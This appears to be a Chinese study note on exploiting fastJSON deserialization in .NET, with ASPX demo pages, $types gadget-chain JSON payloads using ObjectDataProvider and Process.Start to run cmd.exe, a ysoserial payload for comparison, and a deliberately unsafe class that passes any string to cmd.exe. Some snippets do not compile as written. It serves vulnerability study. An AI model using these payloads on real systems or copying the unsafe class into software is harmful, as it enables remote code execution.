.net学习--Fastjson反序列漏洞

download

https://www.nuget.org/packages/fastJSON/2.3.1

 首先还是看看fastjson的序列化和反序列化

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="MyJson" %>
<%@ Import Namespace="fastJSON" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e) { 
        MyJson r= new MyJson { Ivale="whoami",Svale="whoami1"};
    JSONParameters jSONParameters= new JSONParameters
    {
        UseExtensions = true,
    };
    var s=JSON.ToJSON(r,jSONParameters);
        Response.Write(s);
    }
</script>

 可以看见程序集值为types的值，对象中变量在type里面

 反序列化代码

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="MyJson" %>
<%@ Import Namespace="fastJSON" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e) { 
        MyJson r= new MyJson { Ivale="whoami",Svale="whoami1"};
    JSONParameters jSONParameters= new JSONParameters
    {
        UseExtensions = true,
    };
    //var s=JSON.ToJSON(r,jSONParameters);
        var Des= JSON.ToObject<Object>(s,jSONParameters);
        Type gets=Des.GetType();
        PropertyInfo getIvale=gets.GetProperty("Ivale");
        object obj=getIvale.GetValue(Des,null);
        Response.Write(obj);
    }
</script>

 

 打造一款我们的poc

此漏洞的触发点也是在于被序列化djson中的程序集名字是否可控也就是$types

这里我们继续使用有危害的类

        MyJson RCE= new MyJson { Ivale="12",Svale="clac.exe"};
        //StringDictionary dict=new StringDictionary();
        //RCE.GetType().GetField("environmentVariables",BindingFlags.Instance | BindingFlags.NonPublic).SetValue(RCE,dict);
        ObjectDataProvider ok= new ObjectDataProvider();
        ok.MethodName="Clac";
        ok.MethodParameters.Add("clac.exe");
        ok.IsInitialLoadEnabled=true;
        ok.ObjectInstance=RCE;
        jSONParameters.IgnoreAttributes.Add(typeof(IntPtr));
        var txt=JSON.ToJSON(ok,jSONParameters);
        Response.Write(txt);

然后触发序列化执行任意命令

        string txt="{"$types":{"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35":"1","System.RuntimeType, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"2","MyJson.MyJson, App_Code.wjregwzd, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null":"3"},"$type":"1","ObjectType":{"$type":"2"},"ObjectInstance":{"$type":"3","Ivale":"12","Svale":"clac.exe"},"MethodName":"Clac","IsAsynchronous":false,"IsInitialLoadEnabled":true}";
        var okx=JSON.ToObject(txt);
        Response.Write(txt);

 

 打造通用poc

Process start=new Process();
        start.StartInfo.FileName="cmd.exe";
        start.StartInfo.Arguments="/c clac.exe";

        //StringDictionary dict=new StringDictionary();
        //start.GetType().GetField("environmentVariables",BindingFlags.Instance | BindingFlags.NonPublic).SetValue(start,dict);
        ObjectDataProvider ok= new ObjectDataProvider();
        ok.MethodName="Start";
        ok.IsInitialLoadEnabled=true;
        ok.ObjectInstance=start;
        jSONParameters.IgnoreAttributes.Add(typeof(IntPtr));
        var txt=JSON.ToJSON(ok,jSONParameters);
        //string txt="{"$types":{"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35":"1","System.RuntimeType, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"2","MyJson.MyJson, App_Code.wjregwzd, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null":"3"},"$type":"1","ObjectType":{"$type":"2"},"ObjectInstance":{"$type":"3","Ivale":"12","Svale":"clac.exe"},"MethodName":"Clac","IsAsynchronous":false,"IsInitialLoadEnabled":true}";
        //string txt="{"$types":{"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35":"1","System.RuntimeType, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"2","System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"3","System.IntPtr, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"4"},"$type":"1","ObjectType":{"$type":"2"},"ObjectInstance":{"$type":"3","Verb":"","Arguments":"/c echo 123456>>c:\\programdata\\66.txt","CreateNoWindow":false,"RedirectStandardInput":false,"RedirectStandardOutput":false,"RedirectStandardError":false,"StandardErrorEncoding":null,"StandardOutputEncoding":null,"UseShellExecute":true,"UserName":"","Password":null,"PasswordInClearText":null,"Domain":"","LoadUserProfile":false,"FileName":"cmd.exe","WorkingDirectory":"","ErrorDialog":false,"ErrorDialogParentHandle":{"$type":"4"},"WindowStyle":"Normal"},"MethodName":"Start","IsAsynchronous":false,"IsInitialLoadEnabled":true}";
        //var okx=JSON.ToObject(txt,jSONParameters);
        Response.Write(txt);

 

 对比ysoserial生成的payload

{
    "$types":{
        "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35":"1",
        "System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089":"2",
        "System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089":"3"
    },
    "$type":"1",
    "ObjectInstance":{
        "$type":"2",
        "StartInfo":{
            "$type":"3",
            "FileName":"cmd","Arguments":"/c calc"
        }
    },
    "MethodName":"Start"
}

 和我们生成的payload相比较差别在于获取或设置用作绑定源的不同

本次实验危害类

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Xml.Serialization;
using System.IO;
using System.Xml;
using System.Data;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Web;

/// <summary>
/// Summary description for Class1
/// </summary>
namespace MyJson
{
	public class MyJson
	{
		public string Ivale { get; set; }
		public string Svale { get; set; }
        public static void Clac(string Svale)
        {
            string item = Svale;
            Process p = new Process();
            p.StartInfo.FileName = "c:\windows\system32\cmd.exe"; //防止未加入环境变量用绝对路径
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardInput = true;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.RedirectStandardError = true;
            p.StartInfo.CreateNoWindow = true;
            string strOutput = null;
            p.Start();
            p.StandardInput.WriteLine(item);//传入命令参数
            p.StandardInput.WriteLine("exit");
            strOutput = p.StandardOutput.ReadToEnd();
            p.WaitForExit();
            p.Close();
            p.Dispose();
        }
    }
}

 本次实验完整代码

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="MyJson" %>
<%@ Import Namespace="fastJSON" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Windows.Data" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e) { 
        MyJson r= new MyJson { Ivale="whoami",Svale="whoami1"};
    JSONParameters jSONParameters= new JSONParameters
    {
        UseExtensions = true,
    };
   var s=JSON.ToJSON(r,jSONParameters);
        var Des= JSON.ToObject<Object>(s,jSONParameters);
        Type gets=Des.GetType();
        PropertyInfo getIvale=gets.GetProperty("Ivale");
        object obj=getIvale.GetValue(Des,null);
        //Response.Write(obj);
        Process start=new Process();
        start.StartInfo.FileName="cmd.exe";
        start.StartInfo.Arguments="/c clac.exe";

        //StringDictionary dict=new StringDictionary();
        //start.GetType().GetField("environmentVariables",BindingFlags.Instance | BindingFlags.NonPublic).SetValue(start,dict);
        ObjectDataProvider ok= new ObjectDataProvider();
        ok.MethodName="Start";
        ok.IsInitialLoadEnabled=true;
        ok.ObjectInstance=start;
        jSONParameters.IgnoreAttributes.Add(typeof(IntPtr));
        var txt=JSON.ToJSON(ok,jSONParameters);
        //string txt="{"$types":{"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35":"1","System.RuntimeType, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"2","MyJson.MyJson, App_Code.wjregwzd, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null":"3"},"$type":"1","ObjectType":{"$type":"2"},"ObjectInstance":{"$type":"3","Ivale":"12","Svale":"clac.exe"},"MethodName":"Clac","IsAsynchronous":false,"IsInitialLoadEnabled":true}";
        //string txt="{"$types":{"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35":"1","System.RuntimeType, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"2","System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"3","System.IntPtr, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089":"4"},"$type":"1","ObjectType":{"$type":"2"},"ObjectInstance":{"$type":"3","Verb":"","Arguments":"/c echo 123456>>c:\\programdata\\66.txt","CreateNoWindow":false,"RedirectStandardInput":false,"RedirectStandardOutput":false,"RedirectStandardError":false,"StandardErrorEncoding":null,"StandardOutputEncoding":null,"UseShellExecute":true,"UserName":"","Password":null,"PasswordInClearText":null,"Domain":"","LoadUserProfile":false,"FileName":"cmd.exe","WorkingDirectory":"","ErrorDialog":false,"ErrorDialogParentHandle":{"$type":"4"},"WindowStyle":"Normal"},"MethodName":"Start","IsAsynchronous":false,"IsInitialLoadEnabled":true}";
        //var okx=JSON.ToObject(txt,jSONParameters);
        Response.Write(txt);



    }
</script>

 本次实验参考

https://github.com/mgholam/fastJSON
https://www.nuget.org/packages/fastJSON/
https://www.freebuf.com/articles/web/197913.html
https://docs.microsoft.com/zh-cn/dotnet/api/system.windows.data.objectdataprovider.objectinstance?view=netframework-4.0
https://docs.microsoft.com/zh-cn/dotnet/api/system.windows.data.objectdataprovider.objecttype?view=netframework-4.0#System_Windows_Data_ObjectDataProvider_ObjectType